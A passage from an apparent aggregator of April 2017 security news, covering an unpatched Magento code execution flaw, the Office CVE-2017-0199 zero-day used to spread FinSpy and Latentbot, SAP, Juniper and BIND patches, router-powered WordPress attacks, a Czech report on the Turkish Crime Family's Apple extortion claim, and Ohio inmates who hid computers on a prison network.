“So, in short, yes, there is a remote kernel-level code execution vulnerability in Linux, which sounds like the worst of the very worst, but it is pretty much patched by now – and it appears to be tricky to exploit. It was silently addressed in the kernel source over a year ago, and fixed in updates to machines earlier this year, but only now has it come to wider attention.” reported The Register.
Hundreds of thousands Magento e-shops are exploited to hack due to an unpatched flaw
14.4.2017 securityaffairs Vulnerebility
An unpatched vulnerability in Magento platform could be exploited by hackers to compromise fully web servers that host the e-commerce sites.
An unpatched vulnerability in the Magento e-commerce platform could be exploited by attackers to upload and execute malicious PHP scripts on web servers that host online shops.
The vulnerability was reported by experts at the security firm DefenseCode, the issue resides in a feature that was implemented to retrieves preview images for Vimeo videos. The feature was implemented to allow Magento admins to add videos to product listings.
The experts noticed that if the image URL references a different file, such as a PHP script, Magento will download the file to validate it. If the file is not an image, Magento will display the message “Disallowed file type”, leaving it on the server.
An attacker triggering the vulnerability could remotely execute code by first tricking Magento to download an .htaccess configuration file that enables PHP execution inside the download directory and then downloading a malicious PHP script that can work as a backdoor.
At this point it is possible to access the backdoor by accessing it via the browser, the experts explained that the attacker can exploit the script to browse the server directories and read the database password from Magento’s configuration file.
The vulnerability could be exploited only by an authenticated attacker, even if it is a lower-privileged user.
The experts added that if the Magento e-shop doesn’t have the “Add Secret Key to URLs” option turned on, the attacker can launch a cross-site request forgery (CSRF) attack to force a user’s browser to perform an unauthorized request on a website when visiting a different one.
The attacker can hack the Magento shop by tricking the victims into clicking on a link shared by mail or by visiting a specifically crafted web page.
The attack will work against all the users who have active Magento sessions in their browser, exploiting this attack vector hackers might take over users’ accounts.
“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks.” reads the advisory published by DefenseCode.
“The attack can be constructed as simple as “
DefenseCode reported these issues to the Magento development team in November, but the flaws are still unpatched and almost all the the Magento CE versions are affected.
Below the disclosure Timeline
11/18/2016 Vendor contacted via BugCrowd platform
11/18/2016 Vendor responded – aware of issue
04/11/2017 Vendor contacted again without response
04/13/2017 Advisory released to the public
In order to mitigate the attack, experts suggest enforcing the use of ‘Add Secret Key to URLs’
Targeted Malware Inflated With Junk Data to Avoid Detection
13.4.2017 securityweek Virus
A piece of malware used in targeted attacks aimed at South Korea and Japan is inflated with junk data in an effort to avoid detection. While the technique is not exactly new, researchers at Kaspersky Lab believe this particular malware is noteworthy.
The security firm came across the malware while analyzing attacks involving a malware toolkit dubbed “XXMM.” The threat, disguised as a file named srvhost.exe in an effort to avoid raising suspicion, had a size of more than 100 Mb.
Kaspersky’s investigation has revealed that the malware is a Trojan loader designed to activate a backdoor called “wali” by its author. The backdoor module is injected into the iexplore.exe process by the loader.
The size of malware samples typically ranges between a few kilobytes and a few megabytes, depending on how they are packaged. Cybercriminals have also been known to hide malware in movie or ISO files, which can result in malware that has a size of hundreds of megabytes or even a few gigabytes.
What makes Wali interesting is the fact that it’s not delivered as a 100 Mb file. The initial loader is roughly 1 Mb in size, but its two dropper components append tens of megabytes of garbage data to the final malware executable file.
Since the junk data is created dynamically by the droppers, the size of the malware file can vary. Kaspersky has seen both 50 Mb and 100 Mb samples in real world attacks, but experts have also observed a 200 Mb sample generated using the same technique.
Researchers believe this is also a noteworthy threat due to the fact that it has been used in targeted attacks.
“While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives,” explained Kaspersky’s Suguru Ishimaru.
“The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares,” the expert added.
"Callisto" Cyberspies Target Europe, South Caucasus
13.4.2017 securityweek CyberSpy
F-Secure on Thursday published a report detailing the activities of Callisto, a threat actor whose primary goal appears to be intelligence gathering from entities interested in European foreign and security policy.
According to F-Secure, which hasn’t found any links between this and other known threat actors, the Callisto group has been active since at least October 2015. The hackers have been observed targeting various individuals and organizations in Eastern Europe and the South Caucasus region, which encompases Georgia, Armenia and Azerbaijan.
In late 2015, when F-Secure started tracking Callisto, the group had sent out highly targeted Gmail phishing emails. Some of the messages were sent to personal email addresses, suggesting that the attackers had previously conducted reconnaissance. Experts believe the hackers managed to hijack some accounts and used them to send phishing emails to other targets.
In early 2016, the cyberspies sent spear-phishing emails carrying malicious documents to military and government officials, think tank employees and journalists. F-Secure is aware of the malicious emails sent to these individuals, but it’s unclear if the targets actually installed the malware on their systems.
The Word documents sent to targets embedded a piece of malware as an object, eliminating the need for using exploits. If recipients clicked on the document and allowed the package content to run when prompted, the malware would be executed.
The malware has been identified as Scout, one of the tools available in the RCS Galileo platform of Italian spyware maker Hacking Team. The company was hacked back in 2015 and many of its tools were leaked online. Researchers determined that the Callisto group used the installers that had been leaked at the time, rather than relying on the Galileo source code.
The Scout malware has been described as a light backdoor that can be used for reconnaissance and to install other malware on the infected system.
F-Secure’s analysis revealed that the Callisto group’s infrastructure had been linked to servers hosting stores that sell controlled substances, which suggests a possible cybercrime connection. Experts also discovered links between the infrastructure used by the threat actor and countries such as Russia, Ukraine and China.
“A cyber crime group with ties to a nation state, such as acting on behalf of or for the benefit of a government agency, is one potential explanation,” researchers said in their report. “However, we do not believe it is possible to make any definitive assertions regarding the nature or affiliation of the Callisto Group based on the currently available information.”
While F-Secure has not seen any Callisto attacks involving malware for more than a year, the security firm says the group is still active, with new phishing infrastructure set up every week.
It’s worth pointing out that the Russia-linked threat actor dubbed APT28, Pawn Storm and Fancy Bear has also been known to target entities in Eastern Europe and the Caucasus region.
Microsoft Kills Support for Windows Vista
13.4.2017 securityweek Security
While expected for some time, Microsoft this week ended support for its Windows Vista operating systems. The change entered into effect on April 11, the very same day Microsoft began rolling out Windows 10 Creators Update to its users.
Windows Vista has been receiving software updates for the past 10 years, but Microsoft has decided that the time has come to move on.
“As of April 11, 2017, Windows Vista customers are no longer receiving new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft,” the company notes on its support website.
Data coming from netmarketshare shows that the move would impact only 0.72% of all desktop users out there, but that is still a significant figure, considering that many of the Windows Vista computers are used within business environments.
A November report from Duo Security revealed that 65% of the security company’s clients' Windows users were using Vista. The threat this poses to enterprise networks is amplified by the continuous use of an even older operating system within business environments: Windows XP. The platform currently has 7.44% of the desktop operating system market, yet it hasn’t received updates since 2014.
Now that support has ended, Windows Vista will continue to work as before, only that it will become increasingly vulnerable to security risks and malware. What’s more, Internet Explorer 9, which runs on Vista, isn’t supported either, meaning that users are exposed to additional threats when browsing the web using this application.
“Also, as more software and hardware manufacturers continue to optimize for more recent versions of Windows, you can expect to encounter more apps and devices that do not work with Windows Vista,” Microsoft says.
In fact, major browser makers have already announced their end of support for the platform. Mozilla revealed in December 2016 that it would no longer support Vista and XP starting this year, while Google’s Chrome 49 was the last browser iteration released for the two platforms. Gmail isn’t offering support for the operating systems either, after it dropped support for Chrome 53 and older versions in February.
To further determine users to move away from Windows Vista, Microsoft also stopped providing Microsoft Security Essentials for download on this platform. Antimalware signature updates will continue to arrive for installed instances for a limited time, after which users will remain exposed to newer threats.
“Please note that Microsoft Security Essentials (or any other antivirus software) will have limited effectiveness on PCs that do not have the latest security updates. This means that PCs running Windows Vista will not be secure and will still be at risk for virus and malware,” Microsoft notes.
CVE-2017-0199 Zero Day exploit used to deliver FINSPY spyware
13.4.2017 securityaffairs Vulnerebility
Security researchers at FireEye discovered that the Microsoft Word CVE-2017-0199 exploit was linked to cyberspying in Ukraine conflict.
The zero-day vulnerability in Microsoft Office that was recently fixed by Microsoft was used to deliver a surveillance malware to Russian-speaking targets.
Security experts from firm FireEye spotted the targeted attacks leveraging specifically crafted Microsoft Word documents that pretend to be a Russian military training manual.
When the victim opened the document, the attacks starts and a the surveillance malware FinSpy is delivered, the malware is developed by a subsidiary of Gamma Group. Officially the software would be offered for sale only to Government agencies and law enforcement bodies, but privacy advocate speculate the spyware of also sold to authoritarian regime.
“FireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure.” reads the analysis published by FireEye. “Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.”
The experts are still investigating who is the final target of the attacks, however, the decoy document appears to have been published in the Donetsk People’s Republic, a breakaway region in Ukraine that’s received Russian support.
“As early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the “Donetsk People’s Republic” exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.” continues FireEye.
“The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the “Donetsk People’s Republic,” the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.”
The weaponized Russian training manual can download additional payloads along with another fake document claiming to be a Russian decree approving a forest management plan.
FireEye experts suspect a non-state actor may have hacked targets operating like government operators using the FinSpy software.
It is also possible that the zero-day exploit circulated in the cyber criminal underground, in March, a separate attack triggering the same flaw was spotted by the experts.
“As early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware. The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.” adds FireEye.
Likely different hacking groups may have obtained the zero-day knowledge from the same source.
SAP Patches Critical Code Injection Flaw in TREX
13.4.2017 securityweek Vulnerebility
SAP this week released its April 2017 set of patches. The most important of the 15 security notes resolves a Very High priority (Hot News) vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.
Carrying a CVSS score of 9.4, and discovered by ERPScan, the note is the third in a series of patches that SAP has been releasing for NetWeaver Search and Classification (TREX) and NetWeaver Business Warehouse Accelerator (BWA) since December 2015, to prevent remote command execution. The issue was initially addressed with SAP Note 2234226, which was later updated with SAP Note 2273881, and now patched with SAP Note 2419592.
Onapsis, the firm that discovered the original vulnerability in 2015, explains that TREXNet, the internal communication protocol developed for TREX service, does not enforce any kind of authentication, but is required by TREX servers. This means that it exposes systems to malicious actors, who can remotely execute critical system and OS commands.
According to ERPScan, a company that specializes in securing SAP and Oracle products, because TREX is deployed in over a dozen SAP products, including SAP HANA, this vulnerability is considered one of the most widespread and severe SAP server-side issues. What’s more, the advisory with all the details was available on the web for 2 years, thus exposing numerous applications to attacks, ERPScan says.
“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX,” Mathieu Geli, Head of SAP Threat Intelligence at ERPScan and the researcher who discovered the issue, explains.
SAP’s April 2017 advisory reveals that three of the 15 security notes included in this month’s Security Patch Day were updates to previous notes, including one to a Remote Code Execution vulnerability in SAP GUI for Windows. Four of the security notes had a High severity rating, 8 were rated Medium risk, and two were considered Low severity.
ERPScan, on the other hand, says that there were 12 additional security notes included in this set of patches, for a total of 27 notes (17 SAP Security Patch Day Notes and 10 Support Package Notes).
7 of the patches were Missing Authorization Checks, 4 were Cross-Site request forgery, 3 Cross-Site Scripting, 2 Remote Code Execution (RCE), 2 XML external entity, 2 information disclosure, 2 denial of service, 1 open redirect, 1 buffer overflow, 1 directory traversal, and 2 other flaws.
In addition to the RCE flaw in TREX / BWA, SAP addressed three more vulnerabilities found by ERPScan researchers: a Cross-Site Scripting vulnerability in SAP NetWeaver Central Technical Configuration (CVSS Base Score: 6.3), a Cross-Site Scripting vulnerability in SAP NetWeaver Java Archiving Framework (CVSS Base Score: 6.1), and an XML external entity vulnerability in SAP Knowledge Management ICE Service (CVSS Base Score: 4.9).
Other critical issues SAP resolved this month include a Denial of service vulnerability in SAP SAPLPD (CVSS Base Score: 7.5), an XML external entity vulnerability in SAP Web Dynpro Flash Island (CVSS Base Score: 7.5), and a Missing authorization check vulnerability in SAP NetWeaver ADBC Demo Programs (CVSS Base Score: 6.3).
“After a pretty significant March Update, which included the highest critical note of the year (SAP HANA Self Service Vulnerability with CVSS 9.8 and other relevant High Priority notes) this is the second month with remote code injection vulnerabilities present. As a result, SAP Security Note #2419592 should be prioritized among the others as it implies a similar attack as the two others previously mentioned that impact TREX,” Onapsis says.
Juniper Networks Patches Several Flaws With Junos Updates
13.4.2017 securityweek Vulnerebility
Updates released by Juniper Networks for its Junos operating system patch several high and medium severity vulnerabilities. The company has also updated some of the third-party software used by its products.
Juniper Networks informed customers on Tuesday that it has launched an investigation into the new batch of exploits made public last week by the hacker group calling itself Shadow Brokers. The first round of files leaked by the Shadow Brokers in the summer of 2016 was found to contain some exploits targeting devices running Juniper’s ScreenOS.
Until it determines if any of its products are targeted by the newly released exploits, which are believed to have been used by the NSA-linked Equation Group, Juniper Networks has released updates that patch several vulnerabilities in the FreeBSD-based Junos OS.
The most severe of the flaws, based on its CVSS score, is CVE-2016-10142, an issue related to the IPv6 protocol specification, namely ICMP Packet Too Big (PTB) messages. The vulnerability can be exploited for denial-of-service (DoS) attacks.
Another high severity flaw is CVE-2016-1886, a keyboard driver buffer overflow that can be exploited to cause a DoS condition, read parts of the kernel memory, or execute arbitrary code.
It’s worth pointing out that CVE-2016-10142 and CVE-2016-1886 are not specific to Juniper products; the vulnerabilities are in FreeBSD and other Linux distributions.
The third high severity vulnerability is CVE-2017-2313, a DoS issue that affects some Junos systems when BGP is enabled.
The medium severity weaknesses disclosed by the company this week are DoS flaws affecting various configurations. These security holes are tracked as CVE-2017-2313, CVE-2017-2312 and CVE-2017-2340.
Juniper is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.
The vendor also announced patches for vulnerabilities affecting its NorthStar Controller application, and updates for the BIND and NTP components used by the company’s products. The NTP and BIND patches applied by Juniper were first made available several months ago, and other fixes have since been released for both NTP and BIND.
Office 0-Day Abused in Latentbot, WingBird Attacks
13.4.2017 securityweek Vulnerebility
A Microsoft Office 0-day vulnerability that was disclosed just days ago is already being exploited by attackers associated with malware families such as Latentbot and WingBird.
Tracked as CVE-2017-0199, the security bug allows a malicious actor to craft a RTF (Rich Text Format) document that would download and execute a Visual Basic script containing PowerShell commands. Microsoft has already addressed the flaw, but not quick enough to prevent malware such as the Dridex banking Trojan from abusing it in attacks.
The exploit for this vulnerability was found to bypass most mitigations available before a patch was released, and could also render Protected View useless, security researchers discovered. This means that attacks leveraging the vulnerability don’t require user interaction to be successful.
The exploit leverages Office’s Object Linking and Embedding (OLE) functionality to link to an HTA (HTML Application) file hosted on a remote server. When the user opens the RTF document received via spam email, winword.exe issues a HTTP request to retrieve the malicious HTA file, which loads and executes the malicious Visual Basic script. In turn, the script downloads and executes malware.
According to FireEye, the malicious scripts used in these incidents were also observed terminating the winword.exe processes (to hide a prompt from OLE2link) and loading decoy documents.
The security researchers stumbled upon such attacks designed to distribute a newer variant of Latentbot, a highly obfuscated bot that has been active since 2013. The bot has a highly modular plugin architecture and has been also associated with the Pony infostealer.
Latentbot packs different injection mechanisms for Windows XP (x86) and Windows 7 operating systems: it uses Attrib.exe patching and Svchost code Injection on the former, but injects code into svchost.exe directly on the latter.
Another attack abusing this vulnerability consisted of two malicious stages, and distributed a variant of the dropper known as WingBird (which has similar characteristics as FinFisher). Heavily obfuscated, the malware packs several anti-analysis measures, including a custom VM to slow analysis, and was recently associated with the activities of a threat group known as NEODYMIUM.
Netskope Threat Research Labs, on the other hand, say that this Office zero-day vulnerability can also be linked to the Godzilla botnet loader. The researchers observed that the IPs related to the loader were serving payloads associated with exploits for this bug, but say that they “cannot speculate that the spam campaign and zero-day are related,” although the same attack group appears to be behind the attacks.
Office users are advised to apply the newly released patches as soon as possible, to ensure they are protected from these attacks.
Critical bug in SAP TREX affects SAP HANA and other applications
13.4.2017 securityaffairs Vulnerebility
SAP has issued a security patch for the SAP TREX search engine that addresses also a two-years old critical vulnerability.
SAP has issued a security patch for the SAP TREX search engine that addresses multiple vulnerabilities discovered by the experts in a 2015 patch released in December 2015.
The SAP TREX search engine is used by many SAP products, including SAP HANA and itsNetWeaver application and integration platform.
“SAP, the largest enterprise software maker, closed a critical vulnerability affecting SAP’s search engine TREX. The issue stayed exposed almost 2 years.” reads a blog post published by the company ERPScan that discovered the flaw. “The vulnerable component is included in the old SAP NetWeaver platform as well as in the new SAP HANA one, which makes it one of the most widespread and severe SAP server-side issues so far with CVSS score 9.4 out of 10. The vulnerability was identified by specialists at ERPScan,” “If exploited, the vulnerability would allow a remote attacker to get full control over the server without authorization.”
SAP was affected by a critical code injection vulnerability (SAP Security Note 2419592) that he company addressed with the 2015 patch, unfortunately the problem was not completely solved.
Mathieu Geli from ERPScan discovered that the TREXNet communication protocol implemented in the SAP TREX search engine did not implement an authentication mechanism.
“Originally, the vulnerability was discovered in SAP HANA in 2015 and the corresponding SAP Security Note (2234226) was released in December 2015. The issue was dubbed a potential technical information disclosure and fixed by removing some critical functions.” continues the post. “Later on, Mathieu Geli from ERPScan conducted a further research and revealed that the vulnerability was still exploitable. He found out that TREXNet, an internal communication protocol used by TREX, did not provide an authentication procedure. “
The expert made a reverse engineering of a protocol for HANA and then for the SAP TREX search engine. Both share a common protocol, for this reason the exploit could be easily adapted. He highlighted that SAP fixed just some features related to the core protocol.
“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX.” explained the expert.
The vulnerability, tracked as CVE-2017-7691, could be exploited by an attacker to read or create operating system files by sending a crafted request to TREXNet ports.
The flaw was fized along with other bugs in SAP’s April security release.
Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit
13.4.2017 thehackernews Vulnerebility
Recently we reported about a critical code execution vulnerability in Microsoft Word that was being exploited in the wild by cyber criminal groups to distribute malware like Dridex banking trojans and Latentbot.
Now, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also actively being exploited by the government-sponsored hackers to spy on Russian targets since at least this January.
The news comes after security firm FireEye, that independently discovered this flaw last month, published a blog post, revealing that FinSpy spyware was installed as early as January using the same vulnerability in Word that was patched on Tuesday by Microsoft.
For those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML app from a server, disguised as a document created in Microsoft's RTF (Rich Text Format).
FinSpy or FinFisher is associated with the controversial UK-based firm Gamma Group, which sells so-called "lawful intercept" spyware to governments around the world.
"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it," FireEye researchers said.
"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective—a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere."
Months later in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals.
Latentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software.
FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like "hire_form.doc", "!!!!URGENT!!!!READ!!!.doc", "PDP.doc", and "document.doc".
However, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called Terdot, which then installed software that uses the TOR anonymity service to hide the identity of the servers it contacted with.
According to FireEye researchers, the MS Word exploit used to install Finspy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers was obtained from the same source.
This finding highlights that someone who initially discovered this zero-day vulnerability sold it to many actors, including the commercial companies who deals in buying and selling of zero-day exploits as well as financially motivated online criminals.
Also, just Monday evening, Proofpoint researchers too discovered a massive campaign of spam email targeting millions of users across financial institutions in Australia with the Dridex banking malware, again, by exploiting the same vulnerability in Word.
FireEye researchers are still not sure of the source for the exploit that delivered the Dridex banking trojan, but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them.
Microsoft patched the MS Word vulnerability on Tuesday, which hackers, as well as government spies, had been exploiting it for months. So, users are strongly advised to install updates as soon as possible to protect themselves against the ongoing attacks.
BIND Updates Patch Three Vulnerabilities
13.4.2017 securityweek Vulnerebility
The Internet Systems Consortium (ISC) announced this week that updates released for the DNS software BIND patch several denial-of-service (DoS) vulnerabilities that can be exploited remotely.
BIND versions 9.9.9-P8, 9.10.4-P8 and 9.11.0-P5 address three new security holes that could lead to an assertion failure.
The most serious of the flaws, with a “high” severity rating and a CVSS score of 7.5, is CVE-2017-3137. The vulnerability allows an attacker to cause a DoS condition, and it mainly affects recursive resolvers, but authoritative servers could also be vulnerable if they perform recursion.
“A server which is performing recursion can be forced to exit with an assertion failure if it can be caused to receive a response containing CNAME or DNAME resource records with certain ordering,” ISC said in its advisory.
Another vulnerability patched with the latest BIND updates is CVE-2017-3136, a medium severity issue that affects servers configured to use DNS64 with the "break-dnssec yes;" option.
The third flaw, CVE-2017-3138, can be exploited to cause the BIND name server (named) process to exit by sending it a null command string on its control channel. However, the flaw can only be exploited remotely from hosts that are allowed access to the control channel.
ISC said there was no evidence that any of these vulnerabilities had been exploited in the wild.
BIND vulnerable to new reflection attacks
Earlier this month, Ixia security software engineer Oana Murarasu reported finding a new DDoS attack amplification method. The expert discovered that BIND’s recursive DNS resolver allows reflection attacks through root DNAME query responses.
“This amplification attack generates responses 10 or more times larger than the query sent,” Murarasu explained. “For every 1 megabit of traffic sent, 10 megabits is sent to the victim.”
The issue has been reported to ISC, but the organization determined that these attacks are possible due to a protocol design flaw and not a vulnerability in BIND itself. Ixia said Microsoft’s DNS server is not susceptible to such attacks.
Tens of thousands of compromised routers abused in WordPress attacks
13.4.2017 securityaffairs Attack
Hackers exploited the CVE-2014-9222 flaw, also known as ‘Misfortune Cookie’, to hack thousands of home routers and abuse them for WordPress attacks.
According to the experts at the security firm Wordfence tens of thousands, of home routers have been hacked and used to power cyber attacks on WordPress websites.
The security firm observed a spike in the number of attacks originated from Algeria and that targeted customer websites. Further investigation revealed that the attacks were launched from more than 10,000 IP addresses, most of which were associated with state-owned telecoms company Telecom Algeria.
“Last week, while creating the Wordfence monthly attack report, we noticed that Algeria had moved from position 60 in our “Top Attacking Countries” list to position 24. That was a big jump and we were curious why Algeria had climbed the attack rankings so rapidly.” reads the analysis published by Wordfence.
“What we discovered on closer examination is that over 10,000 IP addresses in Algeria were attacking WordPress websites in March. Most IPs were only launching between 50 and 1000 attacks during the entire month.”
The hackers exploited vulnerabilities in the routers provided by Telecom Algeria to its customers, then compromised the devices to launch brute-force and other WordPress attacks.
Wordfence identified compromised routers from 27 ISPs worldwide involved in the WordPress attacks. The routers of more than a dozen of these ISPs are listening on port 7547 that is used by the ISPs for remote management purposes, the experts noticed that all the flawed devices are running a vulnerable version of the AllegroSoft RomPager web server.
All the RomPager versions prior to 4.34 are affected by a critical vulnerability tracked as CVE-2014-9222, also known as ‘Misfortune Cookie‘.
The flaw was reported in December 2014 by researchers at Check Point Software Technologies who discovered that more than 12 Million Home Routers were affected by the issue.
The vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.
Once an attacker compromise a router, it could target any other devices on a local network, such as a smart TV or a printer.
The flaw can be exploited to hijack a large number of devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors.
The routers provided by 14 of the 28 ISPs are vulnerable to Misfortune Cookie attacks.
According Wordfence, in just three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.
Last month, Wordfence observed more than 90,000 unique IP addresses from the 28 ISPs associated with compromised routers, most of them generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.
“In just the past month we have seen over 90,000 unique IP addresses at 28 ISPs that fit our compromised-router attack pattern. We monitor these attacks across our customer websites which is an attack surface of over 2 million websites.” states Wordfence. “We only see a sample of the attacks that all websites globally experience. If you extrapolate the numbers, it indicates that there is a very large number of compromised ISP routers out there performing attacks and acting in concert.”
WordFence has published a free online tool that can be used to check if a router has port 7547 open.
Prison Inmates Built PCs from e-Waste and Connected Online Using Prison Network
13.4.2017 thehackernews Hacking
Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was the case of two Ohio prisoners who built personal computers from parts from e-waste, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday, following almost a year-long investigation.
According to the report, a prison work program has backfired two inmates of Marion Correctional Institution in Ohio, Florida, who smuggled computer parts from an e-waste recycling workshop and built two clandestine computers out of them.
The unsupervised inmates later hid the computers behind a plywood board in the ceiling of a training room, and then connected those working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to access the Internet.
But once the inmates got online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, accessed websites with information about manufacturing drugs, weapons, and explosives, and apply for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software."
The scheme was discovered after prison technology employee Gene Brady alerted about unusual levels of internet activity on a contractor's account on days when the employee was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.
Leeshan McCullough – Chairman of aquaculture.
Robert Cooper – Chairman of horticulture.
Matthew Brown – Chairman of environmental education.
Adam Johnston – Executive committee treasurer.
All the five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.
"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."
The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.
Útok na iPhony se nekonal. Hackeři tvrdí, že jim Apple zaplatil výkupné
12.4.2017 Idnes.cz Apple
Do 7. dubna měly londýnské hackerské skupině, která si říká Turkish Crime Family, přistát na účtech bitcoiny. Jinak hrozila, že zneužije stamiliony přístupových údajů majitelů iPhonů a jiných zařízení firmy Apple. A že jim zablokuje uživatelské účty a smaže data z cloudového úložiště. Později hrozili i tím, že zaútočí na servery společnosti (psali jsme zde).
Turkish Crime Family (Twitter)
@turkcrimefamily
07.dubna 2017 v 20:54, příspěvek archivován: 09.dubna 2017 v 20:26
We're still waiting for the payment, if we do not receive it any time soon the attack will start https://t.co/AUqI6bSmPW
213 lidí to sdílíodpovědětretweetoblíbit
Klíčové datum uplynulo a uživatelům se nestalo nic. Hackeři na twitterovém účtu tvrdí, že je to díky tomu, že výkupné k nim dorazilo.
V pátek nejprve správce účtu Turkish Crime Family napsal, že podle vzkazu od vyjednavače dosáhli s Applem dohody. Později – když uplynulo určených 18:30 středoevropského času – ale přidal tweet o tom, že bitcoiny stále nedorazily a tak jsou připraveni spustit útok.
Následoval jednoduchý tweet: „Ahoj všichni, koukněte, copak to tu máme.“ K němu byl připojený odkaz na kód prohnaný službou zvanou tumbler, která učiní transakci v kryptoměně ještě anonymnější. Zejména tím, že odesilatel je v podstatě nevystopovatelný.
Podle odkazu došlo k transakci v hodnotě 401 bitcoinů, tedy v přepočtu podle nedělního kurzu asi 470 tisíc amerických dolarů (necelých 12 milionů korun).
Turkish Crime Family (Twitter)
@turkcrimefamily
07.dubna 2017 v 22:50, příspěvek archivován: 09.dubna 2017 v 20:27
Hello everybody, look what we have here https://t.co/I3B0wh1Udv
550 lidí to sdílíodpovědětretweetoblíbit
„Dohoda je dohoda,“ potvrdil zástupce skupiny hackerů serveru International Bussines Times (IBT), že na základě výkupného Turkish Crime Family útok odpískalo. Zároveň však tento konec celé akce nijak neosvětlil hlavní otázku, kterou si specializované weby po celou dobu kladly. Do jaké míry byla hrozba reálná? Mohla opravdu skupina způsobit největší technologické firmě světa škody?
Vzhledem k anonymní povaze bitcoinu samozřejmě není jasné, od koho peníze skutečně přišly. Je tak možné, že Apple s vyděrači nijak nevyjednával a ti všechno nafingovali. Poměrně nízkou částku mohla dát skupina dohromady sama a vytvořit si auru hackerů, kteří porazili Apple, což se jim může hodit při budoucích hrozbách.
I mluvčí skupiny pro IBT uvedl, že nedovede podat důkaz o tom, zda převedené bitcoiny opravdu pochází od Applu. Dodal však, že působení skupiny touto akcí nekončí a plánuje něco dalšího.
Samotný Apple, který během celého trvání mediálně poměrně sledované kauzy vydal jen jedno jednoduché prohlášení, na dotaz IBT nereagoval.
Psycho-Analytics Could Aid Insider Threat Detection
12.4.2017 securityweek Safety
Psycho-Analytics Could Help Detect Future Malicious Behavior
The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.
The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.
One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.
Psycho-analytics Used for Insider Threat Detection
Traditional security controls, such as access control and DLP, have some but little effect. In recent years, these have been supplemented by user behavior analytics (UBA), using machine learning to detect anomalous user behavior within the network.
